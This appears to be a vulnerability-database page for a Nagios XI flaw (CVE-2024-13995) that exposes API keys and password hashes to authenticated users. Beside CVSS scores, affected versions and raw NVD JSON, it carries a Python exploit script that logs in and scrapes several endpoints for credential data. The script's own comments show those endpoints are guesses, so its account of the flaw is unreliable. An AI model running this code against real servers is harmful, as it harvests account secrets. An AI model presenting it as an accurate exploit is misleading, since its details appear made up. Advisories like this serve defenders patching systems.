Security Vulnerability Report
CVE-2024-13995 CVSS 8.8 HIGH

CVE-2024-13995

Published: 2025-10-30 22:15:45
Last Modified: 2025-11-06 16:18:00

Description

Nagios XI versions prior to 2024R1.1.2 may (confirmed in 2024R1.1 and 2024R1.1.1) disclose sensitive user account information (including API keys and hashed passwords) to authenticated users who should not have access to that data. Exposure of API keys or password hashes could lead to account compromise, abuse of API privileges, or offline cracking attempts.

CVSS Details

CVSS Score: 8.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:nagios:nagios_xi:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:nagios:nagios_xi:2024:r1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:nagios:nagios_xi:2024:r1.0.1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:nagios:nagios_xi:2024:r1.0.2:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:nagios:nagios_xi:2024:r1.1:*:*:*:*:*:* - VULNERABLE
Nagios XI < 2024R1.1.2
Nagios XI 2024R1.1 (confirmed affected)
Nagios XI 2024R1.1.1 (confirmed affected)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
"""
CVE-2024-13995 PoC - Nagios XI Authenticated Information Disclosure
Note: This PoC is for educational and authorized testing purposes only.
"""
import requests
import json
import sys
from urllib.parse import urljoin


def exploit_nagios_xi_info_disclosure(target_url, username, password):
    """
    Exploit CVE-2024-13995 to extract sensitive user information
    including API keys and password hashes
    """
    session = requests.Session()

    # Step 1: Login to Nagios XI
    login_url = urljoin(target_url, '/nagiosxi/login.php')
    login_data = {
        'username': username,
        'password': password,
        'loginButton': 'Login'
    }

    print(f'[*] Attempting login to {target_url}')
    response = session.post(login_url, data=login_data, allow_redirects=True)

    if 'nagiosxi' not in session.cookies.get_dict() and 'nagiosxi' not in response.text.lower():
        print('[-] Login failed')
        return None

    print('[+] Login successful')

    # Step 2: Extract user information via API endpoint
    # Common endpoint that may leak information
    api_endpoints = [
        '/nagiosxi/api/v1/objects/userinfo',
        '/nagiosxi/api/v1/system/userlist',
        '/nagiosxi/admin/users.php?expand=1',
        '/nagiosxi/includes/components/profile-manager/getuserinfo.php'
    ]

    sensitive_data = []

    for endpoint in api_endpoints:
        try:
            url = urljoin(target_url, endpoint)
            response = session.get(url, timeout=10)

            if response.status_code == 200:
                # Look for sensitive fields
                text = response.text
                if 'api_key' in text.lower() or 'password_hash' in text.lower() or 'hash' in text.lower():
                    print(f'[+] Found potential sensitive data at {endpoint}')

                    # Try to parse JSON response
                    try:
                        data = response.json()
                        sensitive_data.append({'endpoint': endpoint, 'data': data})
                    except ValueError:
                        # Body is not JSON; keep the raw text instead
                        sensitive_data.append({'endpoint': endpoint, 'data': text})
        except Exception as e:
            print(f'[-] Error accessing {endpoint}: {e}')

    return sensitive_data


if __name__ == '__main__':
    if len(sys.argv) < 4:
        print('Usage: python3 cve-2024-13995-poc.py <target_url> <username> <password>')
        print('Example: python3 cve-2024-13995-poc.py http://nagios-server.local admin nagios')
        sys.exit(1)

    target = sys.argv[1]
    user = sys.argv[2]
    pwd = sys.argv[3]

    results = exploit_nagios_xi_info_disclosure(target, user, pwd)

    if results:
        print('\n[+] Sensitive Information Found:')
        print(json.dumps(results, indent=2))
    else:
        print('[-] No sensitive information extracted or target not vulnerable')
```

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2024-13995", "sourceIdentifier": "[email protected]", "published": "2025-10-30T22:15:44.903", "lastModified": "2025-11-06T16:17:59.713", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Nagios XI versions prior to 2024R1.1.2 may (confirmed in 2024R1.1 and 2024R1.1.1) disclose sensitive user account information (including API keys and hashed passwords) to authenticated users who should not have access to that data. Exposure of API keys or password hashes could lead to account compromise, abuse of API privileges, or offline cracking attempts."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", 
"Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-497"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nagios:nagios_xi:*:*:*:*:*:*:*:*", "versionEndExcluding": "2024", "matchCriteriaId": "62CF7BF4-6AAA-443E-93B4-B2F080091C13"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nagios:nagios_xi:2024:r1:*:*:*:*:*:*", "matchCriteriaId": "85F1764D-1DD8-44B0-BF5A-2420CB519A3C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nagios:nagios_xi:2024:r1.0.1:*:*:*:*:*:*", "matchCriteriaId": "C1FE1A0B-78D1-4626-A4CD-21B843DA596E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nagios:nagios_xi:2024:r1.0.2:*:*:*:*:*:*", "matchCriteriaId": "CCAB888E-F030-4640-9A18-9E423E553308"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nagios:nagios_xi:2024:r1.1:*:*:*:*:*:*", "matchCriteriaId": "C648B0A4-053C-4884-8A37-4AF03053ED1C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nagios:nagios_xi:2024:r1.1.1:*:*:*:*:*:*", "matchCriteriaId": "893EEA99-0096-4C9F-BA8A-246A3E3F6C15"}]}]}], "references": [{"url": "https://www.nagios.com/changelog/nagios-xi/", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://www.nagios.com/products/security/#nagios-xi", "source": "[email protected]", "tags": ["Vendor 
Advisory"]}, {"url": "https://www.vulncheck.com/advisories/nagios-xi-api-keys-and-hashed-password-authenticated-information-disclosure", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}